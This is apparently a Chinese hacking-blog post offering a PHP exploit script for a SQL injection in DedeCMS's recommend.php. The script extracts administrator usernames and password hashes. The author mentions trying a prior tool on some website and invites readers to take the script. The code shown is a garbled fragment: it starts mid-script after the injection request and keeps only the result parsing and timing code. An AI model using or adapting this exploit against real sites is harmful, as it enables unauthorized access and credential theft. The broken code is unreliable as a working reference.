今天无意中看到园长MM发的DedeCMS recommend.php 注入利用工具,找了个站测试了一下,发现获取不到内容,郁闷了一下。
拿园长的工具来改改,改成PHP版的,喜欢的拿去。。。
关于漏洞的详情,网上好像没有人分析,代码审计我也不懂,没办法,我是小菜,分析代码的活还是交给大牛们吧。@seay牛
漏洞利用EXP
/', $info, $match)) { echo '========================================' . PHP_EOL; echo '用户名:' . $match[1] . ' 密码:' . substr($match[2], 3, 16) . PHP_EOL; echo '========================================' . PHP_EOL; } else { echo '未知错误,请手工尝试!' . PHP_EOL; } } else { echo '报告大爷,网站不存在此漏洞!' . PHP_EOL; } //统计时间 $start_time = func_time(); //时间统计函数 function func_time() { list($microsec, $sec) = explode(' ', microtime()); return $microsec + $sec; } echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒'; ?>
效果如下:
参考网站:
http://0day5.com/archives/1349
from www.waitalone.cn.thanks for it.
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论